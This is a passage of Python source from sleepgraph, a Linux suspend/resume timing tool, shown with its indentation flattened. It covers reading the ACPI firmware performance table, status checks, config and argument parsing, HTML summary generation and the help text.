if idx > 0 and idx < len(data) - 1:
s = data[idx-1].decode('utf-8')
if s.strip() and s.strip().lower() != 'to be filled by o.e.m.':
out[name] = s
i = n + 2
count += 1
return out
# Function: getFPDT
# Description:
# Read the acpi bios tables and pull out FPDT, the firmware data
# Arguments:
# output: True to output the info to stdout, False otherwise
def getFPDT(output):
rectype = {}
rectype[0] = 'Firmware Basic Boot Performance Record'
rectype[1] = 'S3 Performance Table Record'
prectype = {}
prectype[0] = 'Basic S3 Resume Performance Record'
prectype[1] = 'Basic S3 Suspend Performance Record'
sysvals.rootCheck(True)
if(not os.path.exists(sysvals.fpdtpath)):
if(output):
doError('file does not exist: %s' % sysvals.fpdtpath)
return False
if(not os.access(sysvals.fpdtpath, os.R_OK)):
if(output):
doError('file is not readable: %s' % sysvals.fpdtpath)
return False
if(not os.path.exists(sysvals.mempath)):
if(output):
doError('file does not exist: %s' % sysvals.mempath)
return False
if(not os.access(sysvals.mempath, os.R_OK)):
if(output):
doError('file is not readable: %s' % sysvals.mempath)
return False
fp = open(sysvals.fpdtpath, 'rb')
buf = fp.read()
fp.close()
if(len(buf) < 36):
if(output):
doError('Invalid FPDT table data, should '+\
'be at least 36 bytes')
return False
table = struct.unpack('4sIBB6s8sI4sI', buf[0:36])
if(output):
pprint('\n'\
'Firmware Performance Data Table (%s)\n'\
' Signature : %s\n'\
' Table Length : %u\n'\
' Revision : %u\n'\
' Checksum : 0x%x\n'\
' OEM ID : %s\n'\
' OEM Table ID : %s\n'\
' OEM Revision : %u\n'\
' Creator ID : %s\n'\
' Creator Revision : 0x%x\n'\
'' % (ascii(table[0]), ascii(table[0]), table[1], table[2],
table[3], ascii(table[4]), ascii(table[5]), table[6],
ascii(table[7]), table[8]))
if(table[0] != b'FPDT'):
if(output):
doError('Invalid FPDT table')
return False
if(len(buf) <= 36):
return False
i = 0
fwData = [0, 0]
records = buf[36:]
try:
fp = open(sysvals.mempath, 'rb')
except:
pprint('WARNING: /dev/mem is not readable, ignoring the FPDT data')
return False
while(i < len(records)):
header = struct.unpack('HBB', records[i:i+4])
if(header[0] not in rectype):
i += header[1]
continue
if(header[1] != 16):
i += header[1]
continue
addr = struct.unpack('Q', records[i+8:i+16])[0]
try:
fp.seek(addr)
first = fp.read(8)
except:
if(output):
pprint('Bad address 0x%x in %s' % (addr, sysvals.mempath))
return [0, 0]
rechead = struct.unpack('4sI', first)
recdata = fp.read(rechead[1]-8)
if(rechead[0] == b'FBPT'):
record = struct.unpack('HBBIQQQQQ', recdata[:48])
if(output):
pprint('%s (%s)\n'\
' Reset END : %u ns\n'\
' OS Loader LoadImage Start : %u ns\n'\
' OS Loader StartImage Start : %u ns\n'\
' ExitBootServices Entry : %u ns\n'\
' ExitBootServices Exit : %u ns'\
'' % (rectype[header[0]], ascii(rechead[0]), record[4], record[5],
record[6], record[7], record[8]))
elif(rechead[0] == b'S3PT'):
if(output):
pprint('%s (%s)' % (rectype[header[0]], ascii(rechead[0])))
j = 0
while(j < len(recdata)):
prechead = struct.unpack('HBB', recdata[j:j+4])
if(prechead[0] not in prectype):
continue
if(prechead[0] == 0):
record = struct.unpack('IIQQ', recdata[j:j+prechead[1]])
fwData[1] = record[2]
if(output):
pprint(' %s\n'\
' Resume Count : %u\n'\
' FullResume : %u ns\n'\
' AverageResume : %u ns'\
'' % (prectype[prechead[0]], record[1],
record[2], record[3]))
elif(prechead[0] == 1):
record = struct.unpack('QQ', recdata[j+4:j+prechead[1]])
fwData[0] = record[1] - record[0]
if(output):
pprint(' %s\n'\
' SuspendStart : %u ns\n'\
' SuspendEnd : %u ns\n'\
' SuspendTime : %u ns'\
'' % (prectype[prechead[0]], record[0],
record[1], fwData[0]))
j += prechead[1]
if(output):
pprint('')
i += header[1]
fp.close()
return fwData
# Function: statusCheck
# Description:
# Verify that the requested command and options will work, and
# print the results to the terminal
# Output:
# True if the test will work, False if not
def statusCheck(probecheck=False):
status = ''
pprint('Checking this system (%s)...' % platform.node())
# check we have root access
res = sysvals.colorText('NO (No features of this tool will work!)')
if(sysvals.rootCheck(False)):
res = 'YES'
pprint(' have root access: %s' % res)
if(res != 'YES'):
pprint(' Try running this script with sudo')
return 'missing root access'
# check sysfs is mounted
res = sysvals.colorText('NO (No features of this tool will work!)')
if(os.path.exists(sysvals.powerfile)):
res = 'YES'
pprint(' is sysfs mounted: %s' % res)
if(res != 'YES'):
return 'sysfs is missing'
# check target mode is a valid mode
if sysvals.suspendmode != 'command':
res = sysvals.colorText('NO')
modes = getModes()
if(sysvals.suspendmode in modes):
res = 'YES'
else:
status = '%s mode is not supported' % sysvals.suspendmode
pprint(' is "%s" a valid power mode: %s' % (sysvals.suspendmode, res))
if(res == 'NO'):
pprint(' valid power modes are: %s' % modes)
pprint(' please choose one with -m')
# check if ftrace is available
res = sysvals.colorText('NO')
ftgood = sysvals.verifyFtrace()
if(ftgood):
res = 'YES'
elif(sysvals.usecallgraph):
status = 'ftrace is not properly supported'
pprint(' is ftrace supported: %s' % res)
# check if kprobes are available
if sysvals.usekprobes:
res = sysvals.colorText('NO')
sysvals.usekprobes = sysvals.verifyKprobes()
if(sysvals.usekprobes):
res = 'YES'
else:
sysvals.usedevsrc = False
pprint(' are kprobes supported: %s' % res)
# what data source are we using
res = 'DMESG'
if(ftgood):
sysvals.usetraceevents = True
for e in sysvals.traceevents:
if not os.path.exists(sysvals.epath+e):
sysvals.usetraceevents = False
if(sysvals.usetraceevents):
res = 'FTRACE (all trace events found)'
pprint(' timeline data source: %s' % res)
# check if rtcwake
res = sysvals.colorText('NO')
if(sysvals.rtcpath != ''):
res = 'YES'
elif(sysvals.rtcwake):
status = 'rtcwake is not properly supported'
pprint(' is rtcwake supported: %s' % res)
# check info commands
pprint(' optional commands this tool may use for info:')
no = sysvals.colorText('MISSING')
yes = sysvals.colorText('FOUND', 32)
for c in ['turbostat', 'mcelog', 'lspci', 'lsusb']:
if c == 'turbostat':
res = yes if sysvals.haveTurbostat() else no
else:
res = yes if sysvals.getExec(c) else no
pprint(' %s: %s' % (c, res))
if not probecheck:
return status
# verify kprobes
if sysvals.usekprobes:
for name in sysvals.tracefuncs:
sysvals.defaultKprobe(name, sysvals.tracefuncs[name])
if sysvals.usedevsrc:
for name in sysvals.dev_tracefuncs:
sysvals.defaultKprobe(name, sysvals.dev_tracefuncs[name])
sysvals.addKprobes(True)
return status
# Function: doError
# Description:
# generic error function for catastrphic failures
# Arguments:
# msg: the error message to print
# help: True if printHelp should be called after, False otherwise
def doError(msg, help=False):
if(help == True):
printHelp()
pprint('ERROR: %s\n' % msg)
sysvals.outputResult({'error':msg})
sys.exit(1)
# Function: getArgInt
# Description:
# pull out an integer argument from the command line with checks
def getArgInt(name, args, min, max, main=True):
if main:
try:
arg = next(args)
except:
doError(name+': no argument supplied', True)
else:
arg = args
try:
val = int(arg)
except:
doError(name+': non-integer value given', True)
if(val < min or val > max):
doError(name+': value should be between %d and %d' % (min, max), True)
return val
# Function: getArgFloat
# Description:
# pull out a float argument from the command line with checks
def getArgFloat(name, args, min, max, main=True):
if main:
try:
arg = next(args)
except:
doError(name+': no argument supplied', True)
else:
arg = args
try:
val = float(arg)
except:
doError(name+': non-numerical value given', True)
if(val < min or val > max):
doError(name+': value should be between %f and %f' % (min, max), True)
return val
def processData(live=False, quiet=False):
if not quiet:
pprint('PROCESSING: %s' % sysvals.htmlfile)
sysvals.vprint('usetraceevents=%s, usetracemarkers=%s, usekprobes=%s' % \
(sysvals.usetraceevents, sysvals.usetracemarkers, sysvals.usekprobes))
error = ''
if(sysvals.usetraceevents):
testruns, error = parseTraceLog(live)
if sysvals.dmesgfile:
for data in testruns:
data.extractErrorInfo()
else:
testruns = loadKernelLog()
for data in testruns:
parseKernelLog(data)
if(sysvals.ftracefile and (sysvals.usecallgraph or sysvals.usetraceevents)):
appendIncompleteTraceLog(testruns)
if not sysvals.stamp:
pprint('ERROR: data does not include the expected stamp')
return (testruns, {'error': 'timeline generation failed'})
shown = ['bios', 'biosdate', 'cpu', 'host', 'kernel', 'man', 'memfr',
'memsz', 'mode', 'numcpu', 'plat', 'time', 'wifi']
sysvals.vprint('System Info:')
for key in sorted(sysvals.stamp):
if key in shown:
sysvals.vprint(' %-8s : %s' % (key.upper(), sysvals.stamp[key]))
sysvals.vprint('Command:\n %s' % sysvals.cmdline)
for data in testruns:
if data.turbostat:
idx, s = 0, 'Turbostat:\n '
for val in data.turbostat.split('|'):
idx += len(val) + 1
if idx >= 80:
idx = 0
s += '\n '
s += val + ' '
sysvals.vprint(s)
data.printDetails()
if len(sysvals.platinfo) > 0:
sysvals.vprint('\nPlatform Info:')
for info in sysvals.platinfo:
sysvals.vprint('[%s - %s]' % (info[0], info[1]))
sysvals.vprint(info[2])
sysvals.vprint('')
if sysvals.cgdump:
for data in testruns:
data.debugPrint()
sys.exit(0)
if len(testruns) < 1:
pprint('ERROR: Not enough test data to build a timeline')
return (testruns, {'error': 'timeline generation failed'})
sysvals.vprint('Creating the html timeline (%s)...' % sysvals.htmlfile)
createHTML(testruns, error)
if not quiet:
pprint('DONE: %s' % sysvals.htmlfile)
data = testruns[0]
stamp = data.stamp
stamp['suspend'], stamp['resume'] = data.getTimeValues()
if data.fwValid:
stamp['fwsuspend'], stamp['fwresume'] = data.fwSuspend, data.fwResume
if error:
stamp['error'] = error
return (testruns, stamp)
# Function: rerunTest
# Description:
# generate an output from an existing set of ftrace/dmesg logs
def rerunTest(htmlfile=''):
if sysvals.ftracefile:
doesTraceLogHaveTraceEvents()
if not sysvals.dmesgfile and not sysvals.usetraceevents:
doError('recreating this html output requires a dmesg file')
if htmlfile:
sysvals.htmlfile = htmlfile
else:
sysvals.setOutputFile()
if os.path.exists(sysvals.htmlfile):
if not os.path.isfile(sysvals.htmlfile):
doError('a directory already exists with this name: %s' % sysvals.htmlfile)
elif not os.access(sysvals.htmlfile, os.W_OK):
doError('missing permission to write to %s' % sysvals.htmlfile)
testruns, stamp = processData()
sysvals.resetlog()
return stamp
# Function: runTest
# Description:
# execute a suspend/resume, gather the logs, and generate the output
def runTest(n=0, quiet=False):
# prepare for the test
sysvals.initTestOutput('suspend')
op = sysvals.writeDatafileHeader(sysvals.dmesgfile, [])
op.write('# EXECUTION TRACE START\n')
op.close()
if n <= 1:
if sysvals.rs != 0:
sysvals.dlog('%sabling runtime suspend' % ('en' if sysvals.rs > 0 else 'dis'))
sysvals.setRuntimeSuspend(True)
if sysvals.display:
ret = sysvals.displayControl('init')
sysvals.dlog('xset display init, ret = %d' % ret)
sysvals.dlog('initialize ftrace')
sysvals.initFtrace(quiet)
# execute the test
executeSuspend(quiet)
sysvals.cleanupFtrace()
if sysvals.skiphtml:
sysvals.outputResult({}, n)
sysvals.sudoUserchown(sysvals.testdir)
return
testruns, stamp = processData(True, quiet)
for data in testruns:
del data
sysvals.sudoUserchown(sysvals.testdir)
sysvals.outputResult(stamp, n)
if 'error' in stamp:
return 2
return 0
def find_in_html(html, start, end, firstonly=True):
cnt, out, list = len(html), [], []
if firstonly:
m = re.search(start, html)
if m:
list.append(m)
else:
list = re.finditer(start, html)
for match in list:
s = match.end()
e = cnt if (len(out) < 1 or s + 10000 > cnt) else s + 10000
m = re.search(end, html[s:e])
if not m:
break
e = s + m.start()
str = html[s:e]
if end == 'ms':
num = re.search(r'[-+]?\d*\.\d+|\d+', str)
str = num.group() if num else 'NaN'
if firstonly:
return str
out.append(str)
if firstonly:
return ''
return out
def data_from_html(file, outpath, issues, fulldetail=False):
html = open(file, 'r').read()
sysvals.htmlfile = os.path.relpath(file, outpath)
# extract general info
suspend = find_in_html(html, 'Kernel Suspend', 'ms')
resume = find_in_html(html, 'Kernel Resume', 'ms')
sysinfo = find_in_html(html, '<div class="stamp sysinfo">', '</div>')
line = find_in_html(html, '<div class="stamp">', '</div>')
stmp = line.split()
if not suspend or not resume or len(stmp) != 8:
return False
try:
dt = datetime.strptime(' '.join(stmp[3:]), '%B %d %Y, %I:%M:%S %p')
except:
return False
sysvals.hostname = stmp[0]
tstr = dt.strftime('%Y/%m/%d %H:%M:%S')
error = find_in_html(html, '<table class="testfail"><tr><td>', '</td>')
if error:
m = re.match('[a-z0-9]* failed in (?P<p>\S*).*', error)
if m:
result = 'fail in %s' % m.group('p')
else:
result = 'fail'
else:
result = 'pass'
# extract error info
tp, ilist = False, []
extra = dict()
log = find_in_html(html, '<div id="dmesglog" style="display:none;">',
'</div>').strip()
if log:
d = Data(0)
d.end = 999999999
d.dmesgtext = log.split('\n')
tp = d.extractErrorInfo()
for msg in tp.msglist:
sysvals.errorSummary(issues, msg)
if stmp[2] == 'freeze':
extra = d.turbostatInfo()
elist = dict()
for dir in d.errorinfo:
for err in d.errorinfo[dir]:
if err[0] not in elist:
elist[err[0]] = 0
elist[err[0]] += 1
for i in elist:
ilist.append('%sx%d' % (i, elist[i]) if elist[i] > 1 else i)
wifi = find_in_html(html, 'Wifi Resume: ', '</td>')
if wifi:
extra['wifi'] = wifi
low = find_in_html(html, 'freeze time: <b>', ' ms</b>')
for lowstr in ['waking', '+']:
if not low:
break
if lowstr not in low:
continue
if lowstr == '+':
issue = 'S2LOOPx%d' % len(low.split('+'))
else:
m = re.match('.*waking *(?P<n>[0-9]*) *times.*', low)
issue = 'S2WAKEx%s' % m.group('n') if m else 'S2WAKExNaN'
match = [i for i in issues if i['match'] == issue]
if len(match) > 0:
match[0]['count'] += 1
if sysvals.hostname not in match[0]['urls']:
match[0]['urls'][sysvals.hostname] = [sysvals.htmlfile]
elif sysvals.htmlfile not in match[0]['urls'][sysvals.hostname]:
match[0]['urls'][sysvals.hostname].append(sysvals.htmlfile)
else:
issues.append({
'match': issue, 'count': 1, 'line': issue,
'urls': {sysvals.hostname: [sysvals.htmlfile]},
})
ilist.append(issue)
# extract device info
devices = dict()
for line in html.split('\n'):
m = re.match(' *<div id=\"[a,0-9]*\" *title=\"(?P<title>.*)\" class=\"thread.*', line)
if not m or 'thread kth' in line or 'thread sec' in line:
continue
m = re.match('(?P<n>.*) \((?P<t>[0-9,\.]*) ms\) (?P<p>.*)', m.group('title'))
if not m:
continue
name, time, phase = m.group('n'), m.group('t'), m.group('p')
if ' async' in name or ' sync' in name:
name = ' '.join(name.split(' ')[:-1])
if phase.startswith('suspend'):
d = 'suspend'
elif phase.startswith('resume'):
d = 'resume'
else:
continue
if d not in devices:
devices[d] = dict()
if name not in devices[d]:
devices[d][name] = 0.0
devices[d][name] += float(time)
# create worst device info
worst = dict()
for d in ['suspend', 'resume']:
worst[d] = {'name':'', 'time': 0.0}
dev = devices[d] if d in devices else 0
if dev and len(dev.keys()) > 0:
n = sorted(dev, key=lambda k:(dev[k], k), reverse=True)[0]
worst[d]['name'], worst[d]['time'] = n, dev[n]
data = {
'mode': stmp[2],
'host': stmp[0],
'kernel': stmp[1],
'sysinfo': sysinfo,
'time': tstr,
'result': result,
'issues': ' '.join(ilist),
'suspend': suspend,
'resume': resume,
'devlist': devices,
'sus_worst': worst['suspend']['name'],
'sus_worsttime': worst['suspend']['time'],
'res_worst': worst['resume']['name'],
'res_worsttime': worst['resume']['time'],
'url': sysvals.htmlfile,
}
for key in extra:
data[key] = extra[key]
if fulldetail:
data['funclist'] = find_in_html(html, '<div title="', '" class="traceevent"', False)
if tp:
for arg in ['-multi ', '-info ']:
if arg in tp.cmdline:
data['target'] = tp.cmdline[tp.cmdline.find(arg):].split()[1]
break
return data
def genHtml(subdir, force=False):
for dirname, dirnames, filenames in os.walk(subdir):
sysvals.dmesgfile = sysvals.ftracefile = sysvals.htmlfile = ''
for filename in filenames:
file = os.path.join(dirname, filename)
if sysvals.usable(file):
if(re.match('.*_dmesg.txt', filename)):
sysvals.dmesgfile = file
elif(re.match('.*_ftrace.txt', filename)):
sysvals.ftracefile = file
sysvals.setOutputFile()
if (sysvals.dmesgfile or sysvals.ftracefile) and sysvals.htmlfile and \
(force or not sysvals.usable(sysvals.htmlfile)):
pprint('FTRACE: %s' % sysvals.ftracefile)
if sysvals.dmesgfile:
pprint('DMESG : %s' % sysvals.dmesgfile)
rerunTest()
# Function: runSummary
# Description:
# create a summary of tests in a sub-directory
def runSummary(subdir, local=True, genhtml=False):
inpath = os.path.abspath(subdir)
outpath = os.path.abspath('.') if local else inpath
pprint('Generating a summary of folder:\n %s' % inpath)
if genhtml:
genHtml(subdir)
target, issues, testruns = '', [], []
desc = {'host':[],'mode':[],'kernel':[]}
for dirname, dirnames, filenames in os.walk(subdir):
for filename in filenames:
if(not re.match('.*.html', filename)):
continue
data = data_from_html(os.path.join(dirname, filename), outpath, issues)
if(not data):
continue
if 'target' in data:
target = data['target']
testruns.append(data)
for key in desc:
if data[key] not in desc[key]:
desc[key].append(data[key])
pprint('Summary files:')
if len(desc['host']) == len(desc['mode']) == len(desc['kernel']) == 1:
title = '%s %s %s' % (desc['host'][0], desc['kernel'][0], desc['mode'][0])
if target:
title += ' %s' % target
else:
title = inpath
createHTMLSummarySimple(testruns, os.path.join(outpath, 'summary.html'), title)
pprint(' summary.html - tabular list of test data found')
createHTMLDeviceSummary(testruns, os.path.join(outpath, 'summary-devices.html'), title)
pprint(' summary-devices.html - kernel device list sorted by total execution time')
createHTMLIssuesSummary(testruns, issues, os.path.join(outpath, 'summary-issues.html'), title)
pprint(' summary-issues.html - kernel issues found sorted by frequency')
# Function: checkArgBool
# Description:
# check if a boolean string value is true or false
def checkArgBool(name, value):
if value in switchvalues:
if value in switchoff:
return False
return True
doError('invalid boolean --> (%s: %s), use "true/false" or "1/0"' % (name, value), True)
return False
# Function: configFromFile
# Description:
# Configure the script via the info in a config file
def configFromFile(file):
Config = configparser.ConfigParser()
Config.read(file)
sections = Config.sections()
overridekprobes = False
overridedevkprobes = False
if 'Settings' in sections:
for opt in Config.options('Settings'):
value = Config.get('Settings', opt).lower()
option = opt.lower()
if(option == 'verbose'):
sysvals.verbose = checkArgBool(option, value)
elif(option == 'addlogs'):
sysvals.dmesglog = sysvals.ftracelog = checkArgBool(option, value)
elif(option == 'dev'):
sysvals.usedevsrc = checkArgBool(option, value)
elif(option == 'proc'):
sysvals.useprocmon = checkArgBool(option, value)
elif(option == 'x2'):
if checkArgBool(option, value):
sysvals.execcount = 2
elif(option == 'callgraph'):
sysvals.usecallgraph = checkArgBool(option, value)
elif(option == 'override-timeline-functions'):
overridekprobes = checkArgBool(option, value)
elif(option == 'override-dev-timeline-functions'):
overridedevkprobes = checkArgBool(option, value)
elif(option == 'skiphtml'):
sysvals.skiphtml = checkArgBool(option, value)
elif(option == 'sync'):
sysvals.sync = checkArgBool(option, value)
elif(option == 'rs' or option == 'runtimesuspend'):
if value in switchvalues:
if value in switchoff:
sysvals.rs = -1
else:
sysvals.rs = 1
else:
doError('invalid value --> (%s: %s), use "enable/disable"' % (option, value), True)
elif(option == 'display'):
disopt = ['on', 'off', 'standby', 'suspend']
if value not in disopt:
doError('invalid value --> (%s: %s), use %s' % (option, value, disopt), True)
sysvals.display = value
elif(option == 'gzip'):
sysvals.gzip = checkArgBool(option, value)
elif(option == 'cgfilter'):
sysvals.setCallgraphFilter(value)
elif(option == 'cgskip'):
if value in switchoff:
sysvals.cgskip = ''
else:
sysvals.cgskip = sysvals.configFile(val)
if(not sysvals.cgskip):
doError('%s does not exist' % sysvals.cgskip)
elif(option == 'cgtest'):
sysvals.cgtest = getArgInt('cgtest', value, 0, 1, False)
elif(option == 'cgphase'):
d = Data(0)
if value not in d.phasedef:
doError('invalid phase --> (%s: %s), valid phases are %s'\
% (option, value, d.phasedef.keys()), True)
sysvals.cgphase = value
elif(option == 'fadd'):
file = sysvals.configFile(value)
if(not file):
doError('%s does not exist' % value)
sysvals.addFtraceFilterFunctions(file)
elif(option == 'result'):
sysvals.result = value
elif(option == 'multi'):
nums = value.split()
if len(nums) != 2:
doError('multi requires 2 integers (exec_count and delay)', True)
sysvals.multiinit(nums[0], nums[1])
elif(option == 'devicefilter'):
sysvals.setDeviceFilter(value)
elif(option == 'expandcg'):
sysvals.cgexp = checkArgBool(option, value)
elif(option == 'srgap'):
if checkArgBool(option, value):
sysvals.srgap = 5
elif(option == 'mode'):
sysvals.suspendmode = value
elif(option == 'command' or option == 'cmd'):
sysvals.testcommand = value
elif(option == 'x2delay'):
sysvals.x2delay = getArgInt('x2delay', value, 0, 60000, False)
elif(option == 'predelay'):
sysvals.predelay = getArgInt('predelay', value, 0, 60000, False)
elif(option == 'postdelay'):
sysvals.postdelay = getArgInt('postdelay', value, 0, 60000, False)
elif(option == 'maxdepth'):
sysvals.max_graph_depth = getArgInt('maxdepth', value, 0, 1000, False)
elif(option == 'rtcwake'):
if value in switchoff:
sysvals.rtcwake = False
else:
sysvals.rtcwake = True
sysvals.rtcwaketime = getArgInt('rtcwake', value, 0, 3600, False)
elif(option == 'timeprec'):
sysvals.setPrecision(getArgInt('timeprec', value, 0, 6, False))
elif(option == 'mindev'):
sysvals.mindevlen = getArgFloat('mindev', value, 0.0, 10000.0, False)
elif(option == 'callloop-maxgap'):
sysvals.callloopmaxgap = getArgFloat('callloop-maxgap', value, 0.0, 1.0, False)
elif(option == 'callloop-maxlen'):
sysvals.callloopmaxgap = getArgFloat('callloop-maxlen', value, 0.0, 1.0, False)
elif(option == 'mincg'):
sysvals.mincglen = getArgFloat('mincg', value, 0.0, 10000.0, False)
elif(option == 'bufsize'):
sysvals.bufsize = getArgInt('bufsize', value, 1, 1024*1024*8, False)
elif(option == 'output-dir'):
sysvals.outdir = sysvals.setOutputFolder(value)
if sysvals.suspendmode == 'command' and not sysvals.testcommand:
doError('No command supplied for mode "command"')
# compatibility errors
if sysvals.usedevsrc and sysvals.usecallgraph:
doError('-dev is not compatible with -f')
if sysvals.usecallgraph and sysvals.useprocmon:
doError('-proc is not compatible with -f')
if overridekprobes:
sysvals.tracefuncs = dict()
if overridedevkprobes:
sysvals.dev_tracefuncs = dict()
kprobes = dict()
kprobesec = 'dev_timeline_functions_'+platform.machine()
if kprobesec in sections:
for name in Config.options(kprobesec):
text = Config.get(kprobesec, name)
kprobes[name] = (text, True)
kprobesec = 'timeline_functions_'+platform.machine()
if kprobesec in sections:
for name in Config.options(kprobesec):
if name in kprobes:
doError('Duplicate timeline function found "%s"' % (name))
text = Config.get(kprobesec, name)
kprobes[name] = (text, False)
for name in kprobes:
function = name
format = name
color = ''
args = dict()
text, dev = kprobes[name]
data = text.split()
i = 0
for val in data:
# bracketted strings are special formatting, read them separately
if val[0] == '[' and val[-1] == ']':
for prop in val[1:-1].split(','):
p = prop.split('=')
if p[0] == 'color':
try:
color = int(p[1], 16)
color = '#'+p[1]
except:
color = p[1]
continue
# first real arg should be the format string
if i == 0:
format = val
# all other args are actual function args
else:
d = val.split('=')
args[d[0]] = d[1]
i += 1
if not function or not format:
doError('Invalid kprobe: %s' % name)
for arg in re.findall('{(?P<n>[a-z,A-Z,0-9]*)}', format):
if arg not in args:
doError('Kprobe "%s" is missing argument "%s"' % (name, arg))
if (dev and name in sysvals.dev_tracefuncs) or (not dev and name in sysvals.tracefuncs):
doError('Duplicate timeline function found "%s"' % (name))
kp = {
'name': name,
'func': function,
'format': format,
sysvals.archargs: args
}
if color:
kp['color'] = color
if dev:
sysvals.dev_tracefuncs[name] = kp
else:
sysvals.tracefuncs[name] = kp
# Function: printHelp
# Description:
# print out the help text
def printHelp():
pprint('\n%s v%s\n'\
'Usage: sudo sleepgraph <options> <commands>\n'\
'\n'\
'Description:\n'\
' This tool is designed to assist kernel and OS developers in optimizing\n'\
' their linux stack\'s suspend/resume time. Using a kernel image built\n'\
' with a few extra options enabled, the tool will execute a suspend and\n'\
' capture dmesg and ftrace data until resume is complete. This data is\n'\
' transformed into a device timeline and an optional callgraph to give\n'\
' a detailed view of which devices/subsystems are taking the most\n'\
' time in suspend/resume.\n'\
'\n'\
' If no specific command is given, the default behavior is to initiate\n'\
' a suspend/resume and capture the dmesg/ftrace output as an html timeline.\n'\
'\n'\
' Generates output files in subdirectory: suspend-yymmdd-HHMMSS\n'\
' HTML output: <hostname>_<mode>.html\n'\
' raw dmesg output: <hostname>_<mode>_dmesg.txt\n'\
' raw ftrace output: <hostname>_<mode>_ftrace.txt\n'\
'\n'\
'Options:\n'\
' -h Print this help text\n'\
' -v Print the current tool version\n'\
' -config fn Pull arguments and config options from file fn\n'\
' -verbose Print extra information during execution and analysis\n'\
' -m mode Mode to initiate for suspend (default: %s)\n'\
' -o name Overrides the output subdirectory name when running a new test\n'\
' default: suspend-{date}-{time}\n'\
' -rtcwake t Wakeup t seconds after suspend, set t to "off" to disable (default: 15)\n'\
' -addlogs Add the dmesg and ftrace logs to the html output\n'\
' -noturbostat Dont use turbostat in freeze mode (default: disabled)\n'\
' -srgap Add a visible gap in the timeline between sus/res (default: disabled)\n'\
' -skiphtml Run the test and capture the trace logs, but skip the timeline (default: disabled)\n'\
' -result fn Export a results table to a text file for parsing.\n'\
' -wifi If a wifi connection is available, check that it reconnects after resume.\n'\
' [testprep]\n'\
' -sync Sync the filesystems before starting the test\n'\
' -rs on/off Enable/disable runtime suspend for all devices, restore all after test\n'\
' -display m Change the display mode to m for the test (on/off/standby/suspend)\n'\
' [advanced]\n'\
' -gzip Gzip the trace and dmesg logs to save space\n'\
' -cmd {s} Run the timeline over a custom command, e.g. "sync -d"\n'\
' -proc Add usermode process info into the timeline (default: disabled)\n'\
' -dev Add kernel function calls and threads to the timeline (default: disabled)\n'\
' -x2 Run two suspend/resumes back to back (default: disabled)\n'\
' -x2delay t Include t ms delay between multiple test runs (default: 0 ms)\n'\
' -predelay t Include t ms delay before 1st suspend (default: 0 ms)\n'\
' -postdelay t Include t ms delay after last resume (default: 0 ms)\n'\
' -mindev ms Discard all device blocks shorter than ms milliseconds (e.g. 0.001 for us)\n'\
' -multi n d Execute <n> consecutive tests at <d> seconds intervals. If <n> is followed\n'\
' by a "d", "h", or "m" execute for <n> days, hours, or mins instead.\n'\
' The outputs will be created in a new subdirectory with a summary page.\n'\
' -maxfail n Abort a -multi run after n consecutive fails (default is 0 = never abort)\n'\
' [debug]\n'\
' -f Use ftrace to create device callgraphs (default: disabled)\n'\
' -ftop Use ftrace on the top level call: "%s" (default: disabled)\n'\
' -maxdepth N limit the callgraph data to N call levels (default: 0=all)\n'\
' -expandcg pre-expand the callgraph data in the html output (default: disabled)\n'\
' -fadd file Add functions to be graphed in the timeline from a list in a text file\n'\
' -filter "d1,d2,..." Filter out all but this comma-delimited list of device names\n'\
' -mincg ms Discard all callgraphs shorter than ms milliseconds (e.g. 0.001 for us)\n'\
' -cgphase P Only show callgraph data for phase P (e.g. suspend_late)\n'\
' -cgtest N Only show callgraph data for test N (e.g. 0 or 1 in an x2 run)\n'\
' -timeprec N Number of significant digits in timestamps (0:S, [3:ms], 6:us)\n'\
' -cgfilter S Filter the callgraph output in the timeline\n'\
' -cgskip file Callgraph functions to skip, off to disable (default: cgskip.txt)\n'\
' -bufsize N Set trace buffer size to N kilo-bytes (default: all of free memory)\n'\
' -devdump Print out all the raw device data for each phase\n'\
' -cgdump Print out all the raw callgraph data\n'\
'\n'\
'Other commands:\n'\
' -modes List available suspend modes\n'\
' -status Test to see if the system is enabled to run this tool\n'\
' -fpdt Print out the contents of the ACPI Firmware Performance Data Table\n'\
' -wificheck Print out wifi connection info\n'\
' -x<mode> Test xset by toggling the given mode (on/off/standby/suspend)\n'\
' -sysinfo Print out system info extracted from BIOS\n'\
' -devinfo Print out the pm settings of all devices which support runtime suspend\n'\
' -cmdinfo Print out all the platform info collected before and after suspend/resume\n'\
' -flist Print the list of functions currently being captured in ftrace\n'\
' -flistall Print all functions capable of being captured in ftrace\n'\
' -summary dir Create a summary of tests in this dir [-genhtml builds missing html]\n'\
' [redo]\n'\
' -ftrace ftracefile Create HTML output using ftrace input (used with -dmesg)\n'\
' -dmesg dmesgfile Create HTML output using dmesg (used with -ftrace)\n'\
'' % (sysvals.title, sysvals.version, sysvals.suspendmode, sysvals.ftopfunc))
return True
# ----------------- MAIN --------------------
# exec start (skipped if script is loaded as library)
if __name__ == '__main__':
genhtml = False
cmd = ''
simplecmds = ['-sysinfo', '-modes', '-fpdt', '-flist', '-flistall',
'-devinfo', '-status', '-xon', '-xoff', '-xstandby', '-xsuspend',
'-xinit', '-xreset', '-xstat', '-wificheck', '-cmdinfo']
if '-f' in sys.argv:
sysvals.cgskip = sysvals.configFile('cgskip.txt')
# loop through the command line arguments
args = iter(sys.argv[1:])
for arg in args:
if(arg == '-m'):
try:
val = next(args)
except:
doError('No mode supplied', True)
if val == 'command' and not sysvals.testcommand:
doError('No command supplied for mode "command"', True)
sysvals.suspendmode = val
elif(arg in simplecmds):
cmd = arg[1:]
elif(arg == '-h'):
printHelp()
sys.exit(0)
elif(arg == '-v'):
pprint("Version %s" % sysvals.version)
sys.exit(0)
elif(arg == '-x2'):
sysvals.execcount = 2
elif(arg == '-x2delay'):
sysvals.x2delay = getArgInt('-x2delay', args, 0, 60000)
elif(arg == '-predelay'):
sysvals.predelay = getArgInt('-predelay', args, 0, 60000)
elif(arg == '-postdelay'):
sysvals.postdelay = getArgInt('-postdelay', args, 0, 60000)
elif(arg == '-f'):
sysvals.usecallgraph = True
elif(arg == '-ftop'):
sysvals.usecallgraph = True
sysvals.ftop = True
sysvals.usekprobes = False
elif(arg == '-skiphtml'):
sysvals.skiphtml = True
elif(arg == '-cgdump'):
sysvals.cgdump = True
elif(arg == '-devdump'):
sysvals.devdump = True
elif(arg == '-genhtml'):
genhtml = True
elif(arg == '-addlogs'):
sysvals.dmesglog = sysvals.ftracelog = True
elif(arg == '-nologs'):
sysvals.dmesglog = sysvals.ftracelog = False
elif(arg == '-addlogdmesg'):
sysvals.dmesglog = True
elif(arg == '-addlogftrace'):
